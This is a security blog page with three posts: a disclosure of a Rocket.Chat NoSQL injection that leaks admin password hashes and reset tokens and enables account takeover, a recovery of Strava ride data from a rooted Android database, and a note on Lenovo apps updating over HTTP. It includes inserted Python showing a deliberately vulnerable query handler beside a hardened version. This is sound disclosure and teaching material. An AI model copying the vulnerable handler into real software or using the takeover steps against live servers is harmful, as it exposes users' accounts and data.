Steeve Barbeau's blog - A blog on computer security<br />
<br />
<h2>
NoSQL injection leading to administrator account takeover in Rocket.Chat (0.57.3, 0.58.3 and below)</h2>
Published March 5th 2018 by Steeve Barbeau<br />
<h3>
Executive Summary</h3>
A regular user account can access sensitive data using a NoSQL injection vulnerability in the API provided by Rocket.Chat. The data includes usernames, email addresses, login tokens, password hashes and reset tokens of all users of the application, including administrators. A malicious user can try to crack the password hashes or request a password reset to compromise accounts. Using that vulnerability, a regular user can obtain administrator access on the application, which can result in the exposure of other sensitive data such as conversations, LDAP configuration…<br />
<br />
<h3>
What is Rocket.Chat?</h3>
According to their website, "Rocket.Chat is the leading open source team chat software solution. Free, unlimited and completely customizable with on-premises and SaaS cloud hosting." Based on a <a href="https://twitter.com/RocketChat/status/928028081436184576">tweet</a> from last November, Rocket.Chat has been installed on over 150k servers and is used by more than 10 million people.<br />
<br />
<h3>
Detailed explanations</h3>
This vulnerability has been tested on Rocket.Chat 0.58.3, the last stable release as of October 4th 2017. According to the source code on GitHub, the current development code is also vulnerable.<br />
<br />
Two attack scenarios exploiting this NoSQL injection have been identified:<br />
<br />
<ul>
<li>Password hashes extraction</li>
<li>Account takeover via password reset</li>
</ul>
<br />
<h3>
Password hashes extraction</h3>
Request to the API to show the version:<br />
<img alt="2017-10-04-131626_900x318_scrot.png" height="220" src="https://lh3.googleusercontent.com/tkpm-wb-hmi8CEJ6HczWRl85zooCbz0aXxYT2K3vk7bhPdAgjb5cyOTbTxtWnqwA2bQsHLvAeNFsBhC5hE6DA1KbM1OGjvixtHalf3rG7KUi0IDSwc1P6As-g59RKfRY0f1fuEc3" style="border: none; font-family: arial; font-size: 14.6667px; transform: rotate(0rad); white-space: pre;" width="624" /><br />
<br />
Login to the API with a regular user:<br />
<img alt="2017-10-04-131959_1154x322_scrot.png" height="175" src="https://lh4.googleusercontent.com/qs5q6-BhL-K-G_PGBbjHz2FwJ1r-bGSK9Dr1xv1YYt8sk0XFa5gXC93B6QWCVlCYOJfrI4YoaxVyAXcL-KYtSy8G5Y9-KQUOD52hwLHZIDwNSCWed9J2WDXCY9LU-kwyN8S00zfx" style="border: none; font-family: arial; font-size: 14.6667px; transform: rotate(0rad); white-space: pre;" width="624" /><br />
<br />
Check user privileges:<br />
<img alt="2017-10-04-132141_1037x389_scrot.png" height="235" src="https://lh6.googleusercontent.com/6a1UQmiaMpcfNF3J64fXSoqCvSNZzzoCw4pEe8vYKDHb76xbRXb26Rc_l73ZySMaEaT-ij7MFNuEAeER6Iczsn6NtxE2twxHenK-gUyHGQu7pbJYxQXmjsY7048-vX49NIwctv0R" style="border: none; font-family: arial; font-size: 14.6667px; transform: rotate(0rad); white-space: pre;" width="624" /><br />
<br />
The regular user “attacker” is of type “user” and doesn’t have access to administration features.<br />
<br />
Our regular user is able to list administrators using the NoSQL injection in the “query” parameter:<br />
<img alt="2017-10-04-132255_1080x471_scrot.png" height="272" src="https://lh5.googleusercontent.com/PmOpiNWo_5oOdPwVlm5sYTMB7S3V3wQkMkUTemxRX4_2QLvVGR65CGBy5lY0EFahNKaOTY2zaGO2vDZLc2lwh1OqEpmaLqYa4dvSqlaM5jy16Kga0uD0OVieuWU9MWyU3d8Klf5O" style="border: none; font-family: arial; font-size: 11pt; transform: rotate(0rad); white-space: pre;" width="624" /><br />
<br />
It is also possible to show hidden fields with the “fields” parameter:<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img alt="2017-10-04-132454_1337x564_scrot.png" height="263" src="https://lh5.googleusercontent.com/TnfpRHuv9KMv-jWjGEAm7XvGV2f8rJxX04vxh6BaqgeNIiEobXiqcki3jLaH4KdiuoT8azdlOIwdrOixD68DGJSG_wemINJDqWat0-CXSaXCO2BwwxgbXGJnftdSyarvt9E75mnV" style="border: none; transform: rotate(0rad);" width="624" /></span><br />
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><br /></span>
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"></span><br />
With this information, a regular user has access to the usernames, email addresses and password hashes of administrators, and can use tools such as John the Ripper or Hashcat to try to recover the cleartext passwords. Passwords are hashed using Meteor’s Accounts-password library like this:<br />
<i>hash = bcrypt(sha256(password))</i></div>
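The two parameters above, query and fields, reach the database more or less as the caller sent them. The following Python example, added here and not part of the original post or of Rocket.Chat's own code, models that endpoint against an in-memory stand-in for the MongoDB users collection: the flawed handler passes the caller's JSON straight through, while the hardened handler rejects operator keys, limits filtering to a whitelist of fields and reduces the projection to a whitelist, so the nested service data (password hash, reset token, login tokens) is never returned. The user documents, the service field names and the whitelists are constructed for the example and are assumptions, not values taken from the page.

```python
import json

# Constructed stand-in for a Meteor-style "users" collection. The nested "services"
# sub-document (password hash, reset token, login tokens) is the kind of data the post
# shows leaking; these field names are assumptions for the example, not from the page.
USERS = [
    {"_id": "u1", "username": "admin", "roles": ["admin"], "status": "online",
     "services": {"password": {"bcrypt": "$2a$10$EXAMPLE_ADMIN_HASH",
                               "reset": {"token": "EXAMPLE_RESET_TOKEN"}},
                  "resume": {"loginTokens": [{"hashedToken": "EXAMPLE_LOGIN_TOKEN"}]}}},
    {"_id": "u2", "username": "attacker", "roles": ["user"], "status": "online",
     "services": {"password": {"bcrypt": "$2a$10$EXAMPLE_USER_HASH"}}},
]

# What a non-admin caller may filter on and receive back (constructed whitelists).
ALLOWED_FILTER_FIELDS = {"username", "name", "status"}
ALLOWED_PROJECTION_FIELDS = {"_id", "username", "name", "status"}


class RejectedQuery(ValueError):
    """Raised by the hardened handler when the caller's query or fields are not acceptable."""


def _matches(doc, query):
    """Minimal equality matcher standing in for MongoDB (list fields match on membership)."""
    for key, value in query.items():
        actual = doc.get(key)
        if isinstance(actual, list):
            if value not in actual:
                return False
        elif actual != value:
            return False
    return True


def find(query, projection):
    """Simulates users.find(query, {fields: projection}).fetch() on the sample collection."""
    return [{k: v for k, v in d.items() if projection.get(k)}
            for d in USERS if _matches(d, query)]


def vulnerable_users_list(query_param, fields_param):
    """The flawed pattern: caller-controlled JSON goes straight into the database call,
    so filtering on 'roles' and projecting 'services' are both honoured."""
    return find(json.loads(query_param), json.loads(fields_param))


def _contains_operator(value):
    """True if any key at any depth starts with '$' (a MongoDB operator such as $ne or $regex)."""
    if isinstance(value, dict):
        return any(k.startswith("$") or _contains_operator(v) for k, v in value.items())
    if isinstance(value, list):
        return any(_contains_operator(v) for v in value)
    return False


def parse_query_param(raw):
    """Accept only scalar equality matches on whitelisted fields; anything else is refused."""
    try:
        query = json.loads(raw)
    except json.JSONDecodeError as exc:
        raise RejectedQuery("query is not valid JSON") from exc
    if not isinstance(query, dict):
        raise RejectedQuery("query must be a JSON object")
    if _contains_operator(query):
        raise RejectedQuery("operators are not allowed in query")
    for key, value in query.items():
        if key not in ALLOWED_FILTER_FIELDS:
            raise RejectedQuery(f"filtering on {key!r} is not allowed")
        if not isinstance(value, (str, int, bool)):
            raise RejectedQuery(f"value for {key!r} must be a scalar")
    return query


def parse_fields_param(raw):
    """Reduce the requested projection to the whitelist. Unknown top-level keys such as
    'services' and dotted paths such as 'services.password.bcrypt' are dropped."""
    try:
        fields = json.loads(raw) if raw else {}
    except json.JSONDecodeError as exc:
        raise RejectedQuery("fields is not valid JSON") from exc
    if not isinstance(fields, dict):
        raise RejectedQuery("fields must be a JSON object")
    projection = {k: 1 for k, v in fields.items() if v and k in ALLOWED_PROJECTION_FIELDS}
    return projection or {k: 1 for k in ALLOWED_PROJECTION_FIELDS}


def hardened_users_list(query_param, fields_param):
    """Same endpoint, with both parameters validated before the database is touched."""
    return find(parse_query_param(query_param), parse_fields_param(fields_param))


if __name__ == "__main__":
    print(vulnerable_users_list('{"roles": "admin"}', '{"username": 1, "services": 1}'))
    try:
        hardened_users_list('{"roles": "admin"}', '{"username": 1, "services": 1}')
    except RejectedQuery as exc:
        print("rejected:", exc)
    print(hardened_users_list('{"status": "online"}', '{"username": 1, "services": 1}'))
```

The design point is that the projection is reduced to a whitelist rather than having sensitive keys blacklisted: a blacklist of "services" would still let a dotted path or a new sensitive field through, whereas the whitelist only ever returns the handful of public fields the endpoint was meant to expose.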
<br />
<h3>
Account takeover via password reset</h3>
There is an easier and faster way to compromise administrator accounts: the “Reset password” feature. Before a password reset is requested, the victim's account data looks like this:<br />
<img alt="2017-10-04-133054_1064x514_scrot.png" height="301" src="https://lh5.googleusercontent.com/PjxZjngalSB6mwzEg8R4YEMj2n5u5m9YD6un-vWkup6AxnKuaypvEssnn72iq1oluIahwpBqDd0Tbrlr3IQSYWnQCQS_xb0o_K2xGH89BIbLtuB3kjT06rnm-Z1_cZUwVpHpx0jg" style="border: none; font-family: arial; font-size: 14.6667px; transform: rotate(0rad); white-space: pre;" width="624" /><br />
<br />
We can use the victim's email address to request a password reset:<br />
<img alt="2017-10-04-133215_1357x589_scrot.png" height="271" src="https://lh4.googleusercontent.com/2QimFQKCS9ctQRErsfuovgZ3YObrwTmU_zIyBo7KSdlOlpMf20fCFgzipvBDNaimroSZtTyvKceocH-lqkmMttckBWNAnc71YcGv49menobR3_TxQ7urszqCd8bCQt24D0NjFrK3" style="border: none; font-family: arial; font-size: 14.6667px; transform: rotate(0rad); white-space: pre;" width="624" /><br />
<br />
After the password reset has been requested, a malicious low-privileged user (attacker) can query the API to retrieve the password reset token:<br />
<img alt="2017-10-04-133249_1223x563_scrot.png" height="287" src="https://lh4.googleusercontent.com/i3TaylzfO7vv-pJY6Yn7ukcZnmZFdWFzYjiMbZDSHt0xuOIGhcE0jqpjugnsJfdzNm7fbHckwQBWmWriJCL__MZ33U7soywYgNQ4uEq3AEBNYbSmgbCGVNpqvtftaf0kPs0GkakP" style="border: none; font-family: arial; font-size: 14.6667px; transform: rotate(0rad); white-space: pre;" width="624" /><br />
<br />
With that reset token in hand, a malicious user can reset the victim’s (admin) password:<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img alt="2017-10-04-133401_1359x604_scrot.png" height="277" src="https://lh6.googleusercontent.com/SXT5di3Oaw1T6Evab1c4GAxJQAJzahtD4_YKQ4nOfXzpHR4A4zpG0KZb5j-SXklqYU36AZBetC0hsyN-wPIFOO1apN_SFZwVwqaigIOOJML7RNb0b2dnmv3UYKiO80wev7KkGjTy" style="border: none; transform: rotate(0rad);" width="624" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img alt="2017-10-04-133451_1341x701_scrot.png" height="327" src="https://lh5.googleusercontent.com/E4Hxd2h-eQGhBzK-9yg3b6azqDZGkVOoMeyOy1sjLOGjObnTEyKJeD3s4SqHFQurWRV2seXn4zIByPQwC5s5ApX6Ph_WlH6NPUjRi77Ge4iGVi4twJh0vB-APefP7hnj8BdEiKOl" style="border: none; transform: rotate(0rad);" width="624" /></span></div>
<br />
<h3>
Timeline</h3>
<br />
October 4th 2017: Bug reported<br />
October 5th 2017: <a href="https://github.com/RocketChat/Rocket.Chat/pull/8408">Fix</a> deployed<br />
January 2nd 2018: Attribution of CVE ID <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000493">CVE-2017-1000493</a><br />
January 17th 2018: Official communication from Rocket.Chat about the vulnerability (<a href="https://rocket.chat/2018/01/17/security-vulnerability-disclosure/">Blog post</a> <a href="https://twitter.com/RocketChat/status/954032474912370690">Tweet</a> <a href="https://twitter.com/RocketChat/status/963466593757024256">Tweet</a>)<br />
March 5th 2018: Publication of this blog post<br />
<br />
<br />
Thanks to the Rocket.Chat team for fixing the reported vulnerability quickly.<br />
<br />
<br />
After a quick search on Shodan, I figured out that there is another easy way to compromise a Rocket.Chat application...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivABDV0lbohG4Rbc1mlCLtCCRokthcUF0X60vLOzONS7kMlPI_au43I0UW8iqZOHMKm7X5j93rHRpukEdD6OOGLRUV-E65RoXtTYgFEzZ8qSQb2KBzPMhMcJ5SrR8YcbWaDLzC6YBgg2OF/s1600/2018-03-01-212237_1366x768_scrot.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="633" data-original-width="1057" height="380" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivABDV0lbohG4Rbc1mlCLtCCRokthcUF0X60vLOzONS7kMlPI_au43I0UW8iqZOHMKm7X5j93rHRpukEdD6OOGLRUV-E65RoXtTYgFEzZ8qSQb2KBzPMhMcJ5SrR8YcbWaDLzC6YBgg2OF/s640/2018-03-01-212237_1366x768_scrot.png" width="640" /></a></div>
<br /><div class="blogger-post-footer">Don't hesitate to follow me on Twitter : https://twitter.com/steevebarbeau</div>
<br />
<h2>
How I save my Strava activity</h2>
Published July 26th 2016<br />
Last Sunday, when I got home after my bike ride, I took my smartphone out of my pocket to stop the activity and tried to put it back. But I missed the pocket and the phone fell (screen first) onto the sidewalk. I was able to turn the screen on and off, but the touch sensor was not responding, so the phone was unusable.<br />
Breaking a phone is always annoying, but when it contains the statistics of your longest bike ride, not yet synchronized, it's worse.<br />
<br />
<div style="text-align: center;">
<img src="http://www.fuelrunning.com/repository/running-humor/0154.jpg" /></div>
<br />
I then spent some time thinking about how I could access the details of my activity. I was only able to see the distance and duration on the lock screen, but that was not enough for me.<br />
<br />
<br />
<h2>
The easiest solution</h2>
While I was <strike>complaining</strike> talking about my broken screen and unsynchronized Strava activity on IRC, a friend (Edouard) suggested that I install remote control software to access the phone screen from the computer. That idea was great and worked well.<br />
<br />
For that I connected my phone to my computer via USB and used the <a href="http://www.vysor.io/">Vysor Chrome extension</a> and adb. That's probably doable with any similar tool, but some require installing an app on the device.<br />
<br />
If the device is not connected to the Internet (like my phone, which I used only to record bike rides), it may be necessary to enable WiFi with the "svc wifi enable" command in an adb shell.<br />
If the phone is locked, it may be necessary to unlock it via adb: "input keyevent 66 &amp;&amp; input text XXX &amp;&amp; input keyevent 66" (XXX is the password, 66 is the key code for Enter).<br />
<br />
<br />
<h2>
The geek solution</h2>
When I thought about that issue, my first idea was to analyze the files used by Strava on Android, and my last resort was dumping the memory to look for data related to my activity.<br />
<br />
First things first: I started looking for files on my phone's file system that might hold data related to my Strava activity.<br />
<br />
<i>root@mako:/ # find . 2> /dev/null -name *strava*</i><br />
<br />
A search like the previous one was able to list many files:<br />
<br />
<i>./storage/emulated/0/Android/data/com.strava</i><br />
<i>./storage/emulated/0/Android/data/com.strava/cache/cache_vts_labl_com.strava.m</i><br />
<i>./storage/emulated/0/Android/data/com.strava/cache/cache_vts_com.strava.m</i><br />
<i>./storage/emulated/0/Android/data/com.strava/cache/cache_vts_inaka_com.strava.m</i><br />
<i>./storage/emulated/0/Android/data/com.strava/cache/cache_vts_com.strava.0</i><br />
<i>./storage/emulated/0/Android/data/com.strava/cache/cache_vts_inaka_com.strava.0</i><br />
<i>./storage/emulated/0/.estrongs/.app_icon_back/ver/com.strava_419</i><br />
<i>./storage/emulated/0/.estrongs/.app_icon_back/ver/com.strava_512</i><br />
<i>./storage/emulated/0/.estrongs/.app_icon_back/ver/com.strava_516</i><br />
<i>./storage/emulated/0/.estrongs/.app_icon_back/com.strava.png</i><br />
<div>
<i>[...]</i></div>
<div>
<div>
<i>./data/data/com.strava/shared_prefs/com.strava.preference.excludeFromBackup.xml</i></div>
<div>
<i>./data/data/com.strava/shared_prefs/com.strava.preference.userPreferences.xml</i></div>
<div>
<i>./data/data/com.strava/shared_prefs/com.strava_preferences.xml</i></div>
<div>
<i>./data/data/com.strava/shared_prefs/apptimizecom.strava.xml</i></div>
<div>
<i>./data/data/com.strava/files/DATA_disk_creation_time_vts_labl_com.strava</i></div>
<div>
<i>./data/data/com.strava/files/DATA_disk_creation_time_vts_com.strava</i></div>
<div>
<i>./data/data/com.strava/files/DATA_disk_creation_time_vts_inaka_com.strava</i></div>
<div>
<i>./data/data/com.strava/files/event_store_v2_com.strava</i></div>
<div>
<i>./data/data/com.strava/files/DATA_ServerControlledParametersManager.data.com.strava</i></div>
<div>
<i>./data/data/com.strava/databases/strava</i></div>
<div>
<i>./data/data/com.strava/databases/strava-journal</i></div>
<div>
<i>./data/app/com.strava-1</i></div>
<div>
<i>./data/dalvik-cache/profiles/com.strava</i></div>
<div>
<i>./data/media/0/Android/data/com.strava</i></div>
</div>
<br />
I started by analyzing the cache directory. Each activity recorded by Strava creates a few files in that cache directory. Here is what the content looks like for 3 activities:<br />
<br />
<i>root@mako:/storage/self/primary/Android/data/com.strava/cache # ls -l</i><br />
<i>-rw-rw---- u0_a111 sdcard_rw 76181 2016-07-21 20:02 cache_bd.0</i><br />
<i>-rw-rw---- u0_a111 sdcard_rw 17540 2016-07-24 08:33 cache_bd.1</i><br />
<i>-rw-rw---- u0_a111 sdcard_rw 49152 2016-07-24 08:33 cache_bd.m</i><br />
<i>-rw-rw---- u0_a111 sdcard_rw 22528 2016-07-19 19:49 cache_its.m</i><br />
<i>-rw-rw---- u0_a111 sdcard_rw 22528 2016-07-19 19:49 cache_its_ter.m</i><br />
<i>-rw-rw---- u0_a111 sdcard_rw 23257 2016-07-21 20:24 cache_r.0</i><br />
<i>-rw-rw---- u0_a111 sdcard_rw 32768 2016-07-21 20:24 cache_r.m</i><br />
<i>-rw-rw---- u0_a111 sdcard_rw 4061958 2016-07-24 08:33 cache_vts_com.strava.0</i><br />
<i>-rw-rw---- u0_a111 sdcard_rw 40960 2016-07-24 08:33 cache_vts_com.strava.m</i><br />
<i>-rw-rw---- u0_a111 sdcard_rw 2827 2016-07-21 20:02 cache_vts_inaka_com.strava.0</i><br />
<i>-rw-rw---- u0_a111 sdcard_rw 40960 2016-07-21 20:02 cache_vts_inaka_com.strava.m</i><br />
<i>-rw-rw---- u0_a111 sdcard_rw 27648 2016-07-19 19:49 cache_vts_labl_com.strava.m</i><br />
<i>drwxrwx--x u0_a111 sdcard_rw 2016-07-19 16:53 debug</i><br />
<div>
<br /></div>
These files probably contain some interesting data, but nothing understandable without an in-depth analysis of the app.<br />
<br />
The find command also returned a SQLite database (<i>./data/data/com.strava/databases/strava</i>), which is easier to understand and contains a lot of information.<br />
<br />
<h3>
Database description</h3>
This is a listing of the tables present in this SQLite database, with a short description of their content where I was able to understand it. I didn't try to analyze everything, as I mainly focused on the unsynchronized activity.<br />
<br />
- activities: Information about the activities of the user's friends<br />
- activities_unsynced: Unsynchronized activities<br />
- android_metadata: Only stores the language<br />
- annual_progress_goals: Annual total distance for running, biking and swimming of the user's friends<br />
- athlete_clubs<br />
- athlete_contact<br />
- athlete_stats: Number of activities, distance, duration and elevation gain for running, biking and swimming, for recent activities, for the year and since the user started using the app, for the user and all their friends. NB: the numbers may not be accurate (they don't seem to be updated frequently)<br />
- athletes: Details about the athlete profiles visited, including the profile of the user (with more details than for the other athletes)<br />
- challenge_leaderboards: Summary of the leaderboards for each challenge the user has joined<br />
- challenge_participants: Information about which of the user's friends is participating in which challenge<br />
- challenges: Information about the available challenges<br />
- clubs<br />
- comments<br />
- dorado_impression: A unique URL to a 1x1 gif used to track something (probably Premium ad impressions)<br />
- facebook_search: Information about the user's friends found via Facebook<br />
- feed_entries: Information about activities shown in the app (via clubs or challenges, for example)<br />
- followers: Information about athletes following the user<br />
- followings: Information about the athletes followed by the athletes in the 'athletes' table<br />
- froutes<br />
- gear: List of gear (shoes, bikes) and the distance traveled with each<br />
- kudos<br />
- live_activities<br />
- live_activities_points<br />
- live_athletes<br />
- live_events<br />
- live_location_activities_gson<br />
- live_matches<br />
- live_tracking_contacts<br />
- notification_settings<br />
- notifications: Information about app notifications<br />
- progress_goals: Progress goals of the athletes in the 'athletes' table<br />
- promo_overlay<br />
- related_activites<br />
- routes: Route information for routes that have been displayed on screen (for any kind of user)<br />
- rts_logs: Geolocation data for unsynchronized activities<br />
- segments: Information about activity segments<br />
- sensor_datum: Information ('relative_altitude', 'pause_type') for unsynchronized activities<br />
- streams<br />
- training_videos<br />
- unsynced_photos<br />
- waypoints: Details (latitude, longitude, altitude, speed, elapsed time) for unsynchronized activities<br />
- zones<br />
<div>
<br /></div>
<div>
<br /></div>
<h3>
Let's get my data back</h3>
<br />
The previous table listing shows some interesting tables, like "activities_unsynced", which contains metadata about all unsynchronized activities:<br />
<br />
<i>sqlite> select * from activities_unsynced;</i><br />
<i>id|updated_at|json</i><br />
<i>3|1469393124028|{"activity_id":0,"auto_pause_enabled":false,"commute":false,"distance":84499.02644972557,"elapsed_time":0,"end_timestamp":0,"guid":"REDACTED","is_private":false,"live_activity_id":0,"row_id":3,"m_end_battery_level":-1.0,"m_initial_elevation":94.42694,"m_screen_on":false,"m_screen_on_start":53574812,"m_screen_on_time":723567,"m_screen_timer_invalid":false,"m_start_battery_level":0.99,"sync_state":"UNFINISHED","manual":false,"name":"2016-07-24","photos":[],"route_id":-1,"sensor_averages":{"1":{"a":10000,"b":0,"c":0.0,"e":true},"0":{"a":10000,"b":0,"c":0.0,"e":true},"10":{"a":10000,"b":0,"c":0.0,"e":true},"18":{"a":10000,"b":0,"c":0.0,"e":true}},"should_facebook_share":false,"start_timestamp":1469374573560,"type":"Ride","video_view_id":-1,"workout_type":-1}</i><br />
<div>
<br /></div>
Interesting data include:<br />
- distance<br />
- elapsed time<br />
- start timestamp<br />
- end timestamp<br />
- guid (unique ID of the activity)<br />
- name<br />
- type<br />
- synchronization state<br />
<br />
NB: The timestamps are in milliseconds, i.e. the decimal point is missing (1469374573560 -> 1469374573.560), and the distance is recorded in meters (even if the application is configured to use miles).<br />
<br />
<br />
Another interesting table is "rts_logs", as it contains a few GPS coordinates of the user during the activity:<br />
<br />
<i>sqlite> select * from "rts_logs";</i><br />
<i>id|updated_at|activity_guid|json</i><br />
<i>76|-1|REDACTED|{"m_activity_guid":"REDACTED","m_log_json":"{\"latlng\":[37.74XXXXXX,-122.43XXXXXX],\"timestamp\":1469374596336,\"failure_code\":1001,\"failure_status_code\":-1}","m_type":"request"}</i><br />
<i>[...]</i><br />
<i>sqlite> select count(id) from rts_logs;</i><br />
<i>count(id)</i><br />
<i>67</i><br />
<div>
<br /></div>
<div>
This table can be used to track the user using latitude, longitude and timestamp, but 67 records for an 84 km / 52 mile ride is not that much.</div>
<div>
<br /></div>
<div>
Fortunately, another table contains more detailed information about the activity, and that table is "waypoints":</div>
<div>
<br /></div>
<div>
<div>
<i>sqlite> select * from waypoints;</i></div>
<div>
<i>ride_id|pos|timestamp|latiude|longitude|altitude|h_accuracy|v_accuracy|command|speed|bearing|device_time|filtered|elapsed_time|distance</i></div>
<div>
<i>REDACTED|0|1469374597000|37.74XXXXXX|-122.43XXXXXX|18.60XXXXXXXXXXX|9.0|||7.0|86.3000030517578|1469374596293|0|10241|0.0</i></div>
<div>
<i>[...]</i></div>
<div>
<i>REDACTED|17356|1469393123000|37.74XXXXXX|-122.43XXXXXX|34.X|3.0|||0.0|0.0|1469393123969|1|15800446|84499.0264497256</i></div>
</div>
<div>
<div>
<i>sqlite> select count() from waypoints;</i></div>
<div>
<i>count()</i></div>
<div>
<i>17357</i></div>
</div>
<div>
<br /></div>
<div>
We now have 17357 GPS coordinates to recreate the activity map (using OpenStreetMap or Google Maps) and do some statistics!</div>
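To turn these tables back into a usable activity, here is a Python example added for this write-up (it is not part of the original post and not Strava's code). It rebuilds the two tables with sqlite3 from constructed rows, using the column names from the listings above (including the "latiude" spelling exactly as the page shows it), decodes the JSON column of activities_unsynced, fills in the end time and duration that the unfinished activity has zeroed out from the last waypoint, converts the millisecond timestamps and metre distances, and exports the waypoints as a GPX track for mapping. Against the real database you would open <i>./data/data/com.strava/databases/strava</i> with sqlite3.connect instead of calling build_sample_db().

```python
import json
import sqlite3
from datetime import datetime, timezone

# Column names copied from the page's "select * from waypoints" output, including the
# "latiude" spelling as it appears there. All rows below are constructed for this example.
WAYPOINT_COLUMNS = ("ride_id", "pos", "timestamp", "latiude", "longitude", "altitude",
                    "h_accuracy", "v_accuracy", "command", "speed", "bearing",
                    "device_time", "filtered", "elapsed_time", "distance")

SAMPLE_ACTIVITY_JSON = {
    "guid": "EXAMPLE-GUID", "name": "2016-07-24", "type": "Ride",
    "distance": 84499.02644972557,          # metres, whatever the app's unit setting
    "start_timestamp": 1469374573560,        # milliseconds since the Unix epoch
    "end_timestamp": 0, "elapsed_time": 0,   # zero because the activity never finished
    "sync_state": "UNFINISHED",
}

# (pos, timestamp_ms, lat, lon, altitude_m, elapsed_ms, distance_m), constructed
SAMPLE_WAYPOINTS = [
    (0, 1469374597000, 37.7400, -122.4300, 18.6, 10241, 0.0),
    (1, 1469374607000, 37.7410, -122.4310, 19.0, 20241, 142.0),
    (2, 1469393123000, 37.7450, -122.4350, 34.0, 15800446, 84499.0264497256),
]


def build_sample_db():
    """In-memory SQLite database holding the two tables this post relies on."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE activities_unsynced (id INTEGER, updated_at INTEGER, json TEXT)")
    conn.execute("CREATE TABLE waypoints (%s)" % ", ".join(WAYPOINT_COLUMNS))
    conn.execute("INSERT INTO activities_unsynced VALUES (3, 1469393124028, ?)",
                 (json.dumps(SAMPLE_ACTIVITY_JSON),))
    for pos, ts, lat, lon, alt, elapsed, dist in SAMPLE_WAYPOINTS:
        conn.execute(
            "INSERT INTO waypoints (ride_id, pos, timestamp, latiude, longitude, altitude,"
            " elapsed_time, distance) VALUES (?, ?, ?, ?, ?, ?, ?, ?)",
            (SAMPLE_ACTIVITY_JSON["guid"], pos, ts, lat, lon, alt, elapsed, dist))
    conn.commit()
    return conn


def ms_to_iso(ms):
    """Strava stores epoch milliseconds; GPX wants ISO-8601 in UTC."""
    return datetime.fromtimestamp(ms / 1000, tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")


def unsynced_activities(conn):
    """Decode the json column of activities_unsynced and recover the values that are zero
    for an unfinished activity (end time, elapsed time) from its last waypoint."""
    out = []
    for _id, _updated, raw in conn.execute("SELECT id, updated_at, json FROM activities_unsynced"):
        meta = json.loads(raw)
        last = conn.execute("SELECT MAX(timestamp), MAX(elapsed_time), COUNT(*) "
                            "FROM waypoints WHERE ride_id = ?", (meta["guid"],)).fetchone()
        out.append({
            "guid": meta["guid"], "name": meta["name"], "type": meta["type"],
            "sync_state": meta["sync_state"],
            "start": ms_to_iso(meta["start_timestamp"]),
            "end": ms_to_iso(last[0]) if last[0] else None,
            "elapsed_s": round(last[1] / 1000) if last[1] else None,
            "distance_km": round(meta["distance"] / 1000, 2),
            "distance_mi": round(meta["distance"] / 1609.344, 2),
            "waypoints": last[2],
        })
    return out


def waypoints_to_gpx(conn, ride_id):
    """Serialise the waypoints of one ride as a GPX 1.1 track, ordered by pos."""
    rows = conn.execute(
        "SELECT latiude, longitude, altitude, timestamp FROM waypoints "
        "WHERE ride_id = ? ORDER BY pos", (ride_id,))
    pts = ['    <trkpt lat="%.6f" lon="%.6f"><ele>%.1f</ele><time>%s</time></trkpt>'
           % (lat, lon, alt, ms_to_iso(ts)) for lat, lon, alt, ts in rows]
    return ('<?xml version="1.0" encoding="UTF-8"?>\n'
            '<gpx version="1.1" creator="strava-sqlite-recovery">\n'
            '  <trk><name>%s</name><trkseg>\n%s\n  </trkseg></trk>\n</gpx>\n'
            % (ride_id, "\n".join(pts)))


if __name__ == "__main__":
    db = build_sample_db()
    for activity in unsynced_activities(db):
        print(activity)
    print(waypoints_to_gpx(db, SAMPLE_ACTIVITY_JSON["guid"]))
```

The resulting GPX file can be dropped onto any map viewer or uploaded as a manual activity; the same functions work unchanged against a database pulled from a rooted device with adb.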
<div>
<br /></div>
<div>
I hope that this understanding of the Strava SQLite database can be useful to anyone in a similar situation to mine (broken phone with an unsynchronized activity) or for forensic analysis (there is a lot of GPS data in it)!</div>
Location: San Francisco, CA, USA<br />
<br />
<h2>
Security update issue on Lenovo tablet</h2>
Published April 7th 2015<br />
A few days ago, I spent some of my free time checking what my Chinese Android tablet (Lenovo Yoga 2) was sending to the Internet. I quickly identified some interesting HTTP requests.<br />
<br />
Like most manufacturers, Lenovo ships its tablets with additional software developed by Lenovo or third parties.<br />
The GameStore app is one of them. That application checks whether updates are available over HTTP and, if it finds one, downloads it over HTTP too:<br />
<div>
<br /></div>
<script src="https://gist.github.com/steeve85/89874b7ae3e9c706739e.js"></script>
<br />
<div>
The APK file is also available over HTTPS, but that is not used!</div>
<div>
<br /></div>
<div>
The GameStore app can be used to buy new (unknown) games, and seems to be vulnerable to price tampering (not fully tested, because stealing is as bad as the games on this store). After an update, they removed the payment method that was previously easy to tamper with.</div>
<div>
<br /></div>
<div>
Some Lenovo apps seem to have a similar behaviour. They check for updates over HTTP, but I have not been able to trigger any update download :/ </div>
<div>
Update requests look like this:</div>
<div>
<br /></div>
<div>
<script src="https://gist.github.com/steeve85/e226f79b8c58551f5ec6.js"></script>
</div>
<div>
<br /></div>
<div>
Hey Lenovo, why do you need to know my (private) IP address?</div>
<div>
<br /></div>
<div>
Other update requests are sent to http://susapi.lenovomm.com/adpserver/GetVIByPNUser with different parameters.</div>
<div>
<br /></div>
<div>
The most interesting HTTP requests I saw were those relating to firmware updates! </div>
<div>
The update query looks like this (as my tablet was already up to date, I changed my firmware version in the request):<br />
<br />
<script src="https://gist.github.com/steeve85/cfee5ac0d315327845d5.js"></script>
